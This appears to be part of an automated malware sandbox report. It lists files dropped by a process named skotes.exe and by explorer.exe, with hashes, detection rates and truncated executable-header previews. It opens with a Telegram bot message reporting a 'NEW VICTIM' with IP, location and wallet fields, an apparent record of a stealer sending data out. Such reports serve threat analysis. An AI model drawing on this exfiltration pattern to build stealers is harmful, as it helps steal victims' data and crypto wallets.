                                                                                                                                                                                                                                                                                        MD5:E4326EF0B80D3B8CD32DEE94E8CABD62
                                                                                                                                                                                                                                                                                        SHA1:100C4505EA1FC0D67B2ABE7BA2CAE5B34D4FAC2D
                                                                                                                                                                                                                                                                                        SHA-256:D302D214F72BDC29DE447E104D527D28269AA03B15385A2E102F27835AAECBBF
                                                                                                                                                                                                                                                                                        SHA-512:2D0385C82704A5542A520F5B47E710854C7636056EC2D527A982C422C0E94D2B85F64D3D2DF881D285DB5A4751310477A63DF1A28296E32CC4A249F0211E7D8F
                                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                        Preview:{"ok":true,"result":{"message_id":3300,"from":{"id":7855878545,"is_bot":true,"first_name":"srhjdftjkw4","username":"srhjdftjkw4_bot"},"chat":{"id":7427009775,"first_name":"\u041a\u0430\u0440\u0434\u0430\u043d","last_name":"\u0412\u0430\u043b\u043e\u0432","username":"kardanvalov88","type":"private"},"date":1734018508,"text":"\ud83d\udd14NEW VICTIM - Extensions Installed\nIP Address: 8.46.123.189\nDevice Name: 921702\nLocation: New York City, New York, US\nWallets:\nNothing found","entities":[{"offset":0,"length":35,"type":"bold"},{"offset":36,"length":11,"type":"bold"},{"offset":48,"length":12,"type":"url"},{"offset":61,"length":12,"type":"bold"},{"offset":81,"length":9,"type":"bold"},{"offset":119,"length":8,"type":"bold"},{"offset":128,"length":13,"type":"code"}]}}
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):605696
                                                                                                                                                                                                                                                                                        Entropy (8bit):6.377818589865092
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:12288:aYoGFIZzm1vI5ubYumjqu6lpvD/IlfUye7K3c:aYoGFIZzm1vlbFmjWlpL/Iw7K3
                                                                                                                                                                                                                                                                                        MD5:3567CB15156760B2F111512FFDBC1451
                                                                                                                                                                                                                                                                                        SHA1:2FDB1F235FC5A9A32477DAB4220ECE5FDA1539D4
                                                                                                                                                                                                                                                                                        SHA-256:0285D3A6C1CA2E3A993491C44E9CF2D33DBEC0FB85FDBF48989A4E3B14B37630
                                                                                                                                                                                                                                                                                        SHA-512:E7A31B016417218387A4702E525D33DD4FE496557539B2AB173CEC0CB92052C750CFC4B3E7F02F3C66AC23F19A0C8A4EB6C9D2B590A5E9FAEB525E517BC877BA
                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 63%
                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......M...............B.......B.......v.......v......B........v..c...R.......B.......B...............Bw......Bw+.......C.....Bw......Rich....................PE..d...1.1g.........."....).....l.......2.........@..........................................`..........................................................`..H.......tL...........p..........p.......................(...@...@............................................text...>........................... ..`.rdata..d...........................@..@.data....;..........................@....pdata..tL.......N..................@..@.rsrc...H....`.......,..............@..@.reloc.......p.......2..............@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):605696
                                                                                                                                                                                                                                                                                        Entropy (8bit):6.377818589865092
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:12288:aYoGFIZzm1vI5ubYumjqu6lpvD/IlfUye7K3c:aYoGFIZzm1vlbFmjWlpL/Iw7K3
                                                                                                                                                                                                                                                                                        MD5:3567CB15156760B2F111512FFDBC1451
                                                                                                                                                                                                                                                                                        SHA1:2FDB1F235FC5A9A32477DAB4220ECE5FDA1539D4
                                                                                                                                                                                                                                                                                        SHA-256:0285D3A6C1CA2E3A993491C44E9CF2D33DBEC0FB85FDBF48989A4E3B14B37630
                                                                                                                                                                                                                                                                                        SHA-512:E7A31B016417218387A4702E525D33DD4FE496557539B2AB173CEC0CB92052C750CFC4B3E7F02F3C66AC23F19A0C8A4EB6C9D2B590A5E9FAEB525E517BC877BA
                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 63%
                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......M...............B.......B.......v.......v......B........v..c...R.......B.......B...............Bw......Bw+.......C.....Bw......Rich....................PE..d...1.1g.........."....).....l.......2.........@..........................................`..........................................................`..H.......tL...........p..........p.......................(...@...@............................................text...>........................... ..`.rdata..d...........................@..@.data....;..........................@....pdata..tL.......N..................@..@.rsrc...H....`.......,..............@..@.reloc.......p.......2..............@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):605696
                                                                                                                                                                                                                                                                                        Entropy (8bit):6.377818589865092
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:12288:aYoGFIZzm1vI5ubYumjqu6lpvD/IlfUye7K3c:aYoGFIZzm1vlbFmjWlpL/Iw7K3
                                                                                                                                                                                                                                                                                        MD5:3567CB15156760B2F111512FFDBC1451
                                                                                                                                                                                                                                                                                        SHA1:2FDB1F235FC5A9A32477DAB4220ECE5FDA1539D4
                                                                                                                                                                                                                                                                                        SHA-256:0285D3A6C1CA2E3A993491C44E9CF2D33DBEC0FB85FDBF48989A4E3B14B37630
                                                                                                                                                                                                                                                                                        SHA-512:E7A31B016417218387A4702E525D33DD4FE496557539B2AB173CEC0CB92052C750CFC4B3E7F02F3C66AC23F19A0C8A4EB6C9D2B590A5E9FAEB525E517BC877BA
                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 63%
                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......M...............B.......B.......v.......v......B........v..c...R.......B.......B...............Bw......Bw+.......C.....Bw......Rich....................PE..d...1.1g.........."....).....l.......2.........@..........................................`..........................................................`..H.......tL...........p..........p.......................(...@...@............................................text...>........................... ..`.rdata..d...........................@..@.data....;..........................@....pdata..tL.......N..................@..@.rsrc...H....`.......,..............@..@.reloc.......p.......2..............@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):308224
                                                                                                                                                                                                                                                                                        Entropy (8bit):6.2756558263805555
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:6144:b2JEWGoxDtDYL5s/oAg5+Z4vDWcEGpQTMz9J0tYRVmOEe3M5X64:NWGoxDt0LCgArZ4vHEGpQTMz72K4
                                                                                                                                                                                                                                                                                        MD5:FF1E7643A5C9294BD8E8FD743B323C8F
                                                                                                                                                                                                                                                                                        SHA1:B35C6E9090B44C2DB2220C5C42C0F68210BA73A9
                                                                                                                                                                                                                                                                                        SHA-256:25F4451B243D5E5B05EACCF5DD58E3CFCEE7969B145D9AAD7AFF6750AB9A6D0B
                                                                                                                                                                                                                                                                                        SHA-512:62B1F41DCAB0F4330D761CDBFC4E99E15830B4CDCC44E7788FD15F57F5043EB53E626E009C397DCCE13841E192165C4584CEE0F57C0E5BD5B876F507D051B675
                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 58%
                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......a\.i%=.:%=.:%=.:,EJ:&=.:%=.:&=.:JKr:-=.:JKC:$=.:JKD:$=.:Rich%=.:................PE..d...`PYg.........."......:...*......\4.........@..........................................@.................................................@h..(.......(.......@....................................................................P.. ............................text....9.......:.................. ..`.rdata.......P.......>..............@..@.data........p......................@....pdata..@............X..............@..@.rsrc...(............\..............@..@.x64.....`.......T...`..................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):1985024
                                                                                                                                                                                                                                                                                        Entropy (8bit):7.934912947712122
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:24576:rP+AXJnenhDBV6oXTQ0pCPx2WOe7XKFdJ14xvKuvOy+EJvXWSNuMERtWYX4bmn2p:rP9JotV6ojQnYOyPDFEpXD4MEX3Cmni
                                                                                                                                                                                                                                                                                        MD5:5A3F6AA1107D91BDC0430E2A0C1F4F26
                                                                                                                                                                                                                                                                                        SHA1:316139DD3EDCD5AF3A8AFBD89E44AC10BB8E87E7
                                                                                                                                                                                                                                                                                        SHA-256:F43DED143A77002B6AA1B860AECCA5B94E00A601D1DB104D04423E3B5E0261CA
                                                                                                                                                                                                                                                                                        SHA-512:712F40770C3D645E54AAC46ECB6CF51065AE30253E39E5FDA861191D23AA2BE2BB1D1E69043610F9AD22F2C86C532C759C2A4E06277B85C056E1C9F097C9143A
                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 37%
                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!J..@$..@$..@$......@$......@$......@$..._..@$..@%..@$......@$......@$......@$.Rich.@$.........PE..L......d..........................................@.........................................................................Z.B.n.....@.h!.................................................. ....................................................... . ..@......T..................@....rsrc...h!....@......d..............@....idata ......B.....................@... . *.. B.....................@...ehftnwgk.0...@l..(..................@...unlnktmr.....p.......$..............@....taggant.0......."...(..............@...........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):970752
                                                                                                                                                                                                                                                                                        Entropy (8bit):6.703412903051273
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:24576:JqDEvCTbMWu7rQYlBQcBiT6rprG8aym0Z:JTvC/MTQYxsWR7aym0
                                                                                                                                                                                                                                                                                        MD5:E477E0C89BDFE4F98170878F85624A0C
                                                                                                                                                                                                                                                                                        SHA1:F0321409B7D9B8303BA46B53A5BBDBB26C6B446E
                                                                                                                                                                                                                                                                                        SHA-256:41D06B73F313D3F14D3ECD825911751B7C1ED171FB0CE546662A934A3CB6F3ED
                                                                                                                                                                                                                                                                                        SHA-512:C2C1890EC0078F552AFEF0BB6F0F088E08B81843526435E6EC32092E58FDCD8A2F6B5DD3C5372FE9545821ED5E382BFC55887DAA2F0F67809008C819245BC017
                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 26%
                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                        Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L.....Zg..........".......... ......w.............@..........................0.......8....@...@.......@.....................d...|....@..(e.......................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...(e...@...f..................@..@.reloc...u.......v...Z..............@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):1807360
                                                                                                                                                                                                                                                                                        Entropy (8bit):7.943588775528353
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:24576:FXRnTWS9M6G832tc8aegrm2rIEjvWDBqE0A+hBcwbPna7r4EK5DwUoza:FBaSm6nCaetEKDcH+7rD5U1
                                                                                                                                                                                                                                                                                        MD5:CD917C036DA4DC2B3E30E12B135A87E2
                                                                                                                                                                                                                                                                                        SHA1:E1D0A610EBC4D4500D01CE193A803A94542893DD
                                                                                                                                                                                                                                                                                        SHA-256:73BF8E4A7D1BAA981576BD9789CA7B13F9E53424DC283000474753EF51C11F4A
                                                                                                                                                                                                                                                                                        SHA-512:8F095FB21086EF7CF673F8EEE5218592E7C0CF1397A2B4B11B7B5F29C0B6F194F1F1C8961B9218094146022D64D0093251D57D419A09B61D7A0571672B96C2FB
                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 47%
                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ...d..d..d....s.|....F.i....r.^..m.[.g..m.K.b....g..d.......w.w....E.e..Richd..........PE..L....dTg.....................(.......`i...........@...........................i.....y.....@.................................M.$.a.....$.......................$..................................................................................... . ..$......h..................@....rsrc.........$......x..............@....idata ......$......z..............@... ..*...$......|..............@...tdoajogz.....`O......~..............@...xfulpslq.....Pi......n..............@....taggant.0...`i.."...r..............@...................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):2791936
                                                                                                                                                                                                                                                                                        Entropy (8bit):6.551070324318134
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:49152:IgFovv+WOSQ6SVSDXFpcaqYbcmO4el4cMe:7yGW7Q6SYTFDqYbcmO4el/Me
                                                                                                                                                                                                                                                                                        MD5:38702763DFEDB9AD700580558B2E2CDE
                                                                                                                                                                                                                                                                                        SHA1:A9D4F0323B1CF8DA172FE3EBEAB4984BB644C0D6
                                                                                                                                                                                                                                                                                        SHA-256:79581F3E833D3CF26FDCD59A4C87261208909DBE061127F34D57ECB34C3EAA13
                                                                                                                                                                                                                                                                                        SHA-512:4B00ACB48CF0DB1FA63572E84F94CF34E25E52B766E33460ED08ECD769B23C7C3F151FFCA0BECAC759FBDE83245E5256EEA98BD9E056D4CCA8D40BB2B644E180
                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                        Preview:MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P(,e.........."...0..$............+.. ...`....@.. .......................@+.....r9+...`.................................U...i....`.............................................................................................................. . .@... ....... ..............@....rsrc........`.......2..............@....idata . ...........8..............@...nwmnxdbs.@*......:*..:..............@...esrtnfgg. ....*......t*.............@....taggant.@....+.."...x*.............@...................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):393728
                                                                                                                                                                                                                                                                                        Entropy (8bit):6.004737079894222
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:6144:sb3tLc1aQEo7F8Ci7oUPI13oxfys0geKPVMd5:uto1moSCi8RGBr7zVi
                                                                                                                                                                                                                                                                                        MD5:DFD5F78A711FA92337010ECC028470B4
                                                                                                                                                                                                                                                                                        SHA1:1A389091178F2BE8CE486CD860DE16263F8E902E
                                                                                                                                                                                                                                                                                        SHA-256:DA96F2EB74E60DE791961EF3800C36A5E12202FE97AE5D2FCFC1FE404BC13C0D
                                                                                                                                                                                                                                                                                        SHA-512:A3673074919039A2DC854B0F91D1E1A69724056594E33559741F53594E0F6E61E3D99EC664D541B17F09FFDEBC2DE1B042EEC19CA8477FAC86359C703F8C9656
                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 55%
                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........'..F...F...F.......F.......F.......F.....F...F...F.......F.......F.......F..Rich.F..........PE..L....f.e.................b...........Q............@...........................$.............................................8g..d....0...:...........................................................-..@............................................text....a.......b.................. ..`.data............`...f..............@....rsrc....z...0...<..................@..@........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):2660864
                                                                                                                                                                                                                                                                                        Entropy (8bit):6.051984276194483
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:49152:gd/7YsW9mB5b+c2J9hFLuamiqFeQuADlaUoHtM3ljgfyeqX+zBE:gd/7vW9mHbH2J9hFLuamiPQuklaUoH2g
                                                                                                                                                                                                                                                                                        MD5:2A78CE9F3872F5E591D643459CABE476
                                                                                                                                                                                                                                                                                        SHA1:9AC947DFC71A868BC9C2EB2BD78DFB433067682E
                                                                                                                                                                                                                                                                                        SHA-256:21A2AC44ACD7A640735870EEBFD04B8DC57BC66877CB5BE3B929299E86A43DAE
                                                                                                                                                                                                                                                                                        SHA-512:03E2CD8161A1394EE535A2EA7D197791AB715D69A02FFAB98121EC5AC8150D2B17A9A32A59307042C4BBEFFAD7425B55EFA047651DE6ED39277DBA80711454F9
                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 68%
                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............A...A...A...@...A...@'..A...@...A.4.@...A.4.@...A.4.@...A...@...A...A...A*4.@...A*46A...A*4.@...ARich...A........................PE..L....YVg...............*..$...........$.......$...@...........................(.....dm)...@...................................%.(....@%.%....................@(.......%.p.............................%.@.............$..............................text...2.$.......$................. ..`.rdata...^....$..`....$.............@..@.data........ %.......%.............@....rsrc...%....@%.......%.............@..@.reloc.......@(.......(.............@..B................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):3053056
                                                                                                                                                                                                                                                                                        Entropy (8bit):7.999890228195207
                                                                                                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                                                                                                        SSDEEP:49152:8EcTr/pRI84Ku93VViUVp586E2I1UG4yqvkYPm3/e3MzrNp7Sunihnoy7:8Hr/Y8ju9FVFVpu6dC8PmWczrPnfy
                                                                                                                                                                                                                                                                                        MD5:99F996079094AD472D9720B2ABD57291
                                                                                                                                                                                                                                                                                        SHA1:1FF6E7CAFEAF71A5DEBBC0BB4DB9118A9D9DE945
                                                                                                                                                                                                                                                                                        SHA-256:833FD615EC3E7576960A872FFF5A4459B0C756338068F87341655849D1F7E1AF
                                                                                                                                                                                                                                                                                        SHA-512:6A6D4034B37F9BB3B4A0B455DE7485B990BF3BD3042316D7261BD2973DBE522490654045D579A6DF58A4B834E04C377897EEA41798E6B1F5FDBC45A2BB0D127F
                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 34%
                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................."..............pf.0.....f...@..............................0............`... .............................................. ..................T...................................................................................................UPX0.....pf.............................UPX1..........f.....................@...UPX2......... ......................@...4.24.UPX!.$...V9uv.%..........I5..<.........Pm.|E...B..2@......^1sMwG.3............BTI.X`.(....".....U....{"..7....N.e(.=.(.(..s..WDd.;{.Os/.0.&p.`....PN.w....S...%.2.S....?..8.7x+.....v.J....t(..>..../.z..oscz........y.....,v$.j]M.......R.d..h1a..}..}.h.....-.=.U4.}....y.Q....:...G.Q...........2]..0[..^.=K.?../>S.....Z....9.pv..u...w...Onm%.E..u..q.........^n. ..<g..CO...U.QB..Z.<......x.%.THn.b<o......S.........h.,.xdn.D&Vrl......#.r..8..E..t.+.}e.k....G.I...o:.o
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe
                                                                                                                                                                                                                                                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):242176
                                                                                                                                                                                                                                                                                        Entropy (8bit):6.47050397947197
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:6144:SIQpxILDXGGMO7Ice9C5kQw2hWHcHTykhb:SIQpxILDXGGlET9n/cHG
                                                                                                                                                                                                                                                                                        MD5:2ECB51AB00C5F340380ECF849291DBCF
                                                                                                                                                                                                                                                                                        SHA1:1A4DFFBCE2A4CE65495ED79EAB42A4DA3B660931
                                                                                                                                                                                                                                                                                        SHA-256:F1B3E0F2750A9103E46A6A4A34F1CF9D17779725F98042CC2475EC66484801CF
                                                                                                                                                                                                                                                                                        SHA-512:E241A48EAFCAF99187035F0870D24D74AE97FE84AAADD2591CCEEA9F64B8223D77CFB17A038A58EADD3B822C5201A6F7494F26EEA6F77D95F77F6C668D088E6B
                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Jl.X...........!..................... ........... ....................... ............@.....................................W.................................................................................... ............... ..H............text...4.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H........`..4e...........U..............................................}.Y.y.=.{.X.x.=..r...p.o2....o...(3.....o2...}....*:..s.....(....*.......*2r...p(;...&*Vr...p.....r...p.....*..(....*>.........}....*...(C.....o...(D...(E...}.....(F...(E...(G...&*>.........}....*...(C.....o...(D...}.....(F...(E...(H...&*".......*>.........}....*R..} .....{ ...oo...*..{ ...*"..}!...*..{!...*...}.....{#....{....op....{....,...{ ...oo...*..{!...oo...*..{....*B.....su...(v...*..{#....{#...
                                                                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exe
                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):1502720
                                                                                                                                                                                                                                                                                        Entropy (8bit):7.646111739368707
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:24576:7i4dHPD/8u4dJG/8yndSzGmTG2/mR2SGeYdc0GmTG2/mR6Trr2h60qP:7rPD/8I/8ly+Zrr2h60qP
                                                                                                                                                                                                                                                                                        MD5:A8CF5621811F7FAC55CFE8CB3FA6B9F6
                                                                                                                                                                                                                                                                                        SHA1:121356839E8138A03141F5F5856936A85BD2A474
                                                                                                                                                                                                                                                                                        SHA-256:614A0362AB87CEE48D0935B5BB957D539BE1D94C6FDEB3FE42FAC4FBE182C10C
                                                                                                                                                                                                                                                                                        SHA-512:4479D951435F222CA7306774002F030972C9F1715D6AAF512FCA9420DD79CB6D08240F80129F213851773290254BE34F0FF63C7B1F4D554A7DB5F84B69E84BDD
                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 75%
                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..._............"...0..0...........O... ...`....@.. .......................@............`.................................LO..O....`...................... ......0O............................................... ............... ..H............text..../... ...0.................. ..`.rsrc.......`.......2..............@..@.reloc....... ......................@..B.................O......H.......h~...D......U... .................................................(....*..(....*.~....-.r...p.....(....o....s.........~....*.~....*.......*j(....r=..p~....o....t....*j(....rM..p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*j(....r...p~....o....t....*.~....*..(....*Vs....(....t.........*N.(.....(.....(....*....0..f.......(.........8M........o....9:....o.......o.......-a.{......<...%..o.....%.
                                                                                                                                                                                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):5915948
                                                                                                                                                                                                                                                                                        Entropy (8bit):7.986087782286569
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:98304:7U0q2B/JWHioVQWJuhswoYv5eO0zo0Ahd6y0Naxxv8fqDDAx06btVUJFaeM8+q8i:7v0HiouWJysVYvsOaoyMxxvjDDAx0akt
                                                                                                                                                                                                                                                                                        MD5:AE2A4249C8389603933DF4F806546C96
                                                                                                                                                                                                                                                                                        SHA1:A71AD1C875E0282B84451095E01D9C1709129643
                                                                                                                                                                                                                                                                                        SHA-256:CBE157A18DF07D512F3E4939D048F6419163892BF0CC5D5694EAADC7809D2477
                                                                                                                                                                                                                                                                                        SHA-512:1C40EF124087B8FF3B66DDBCDBEF1CD7FFCD112D137DBF0A5FF3B636642CAE35B8D4F12EB38506DA86AB81984EDD6552DC395F072FED37D120DAF064BA468CD2
                                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 29%
                                                                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Xhc.Xhc.Xhc...`._hc...f..hc...g.Rhc...[hc..`.Qhc..g.Ihc..f.phc...b.Shc.Xhb..hc.K.g.Ahc.K.a.Yhc.RichXhc.........PE..d...,bXg.........."....(.....X.................@....................................*OZ...`.................................................l...x............`..."..............h.......................................@...............P............................text............................... ..`.rdata..B&.......(..................@..@.data....s..........................@....pdata..."...`...$..................@..@.rsrc...............................@..@.reloc..h...........................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                        Process:C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                                        Size (bytes):307712
                                                                                                                                                                                                                                                                                        Entropy (8bit):5.0813370955801656
                                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                                        SSDEEP:3072:GcZqf7D34kp/0+mAYkygYdQ0ghnB1fA0PuTVAtkxzF3R4eqiOL2bBOA:GcZqf7DIcnGapB1fA0GTV8krYL
                                                                                                                                                                                                                                                                                        MD5:F0AAF1B673A9316C4B899CCC4E12D33E
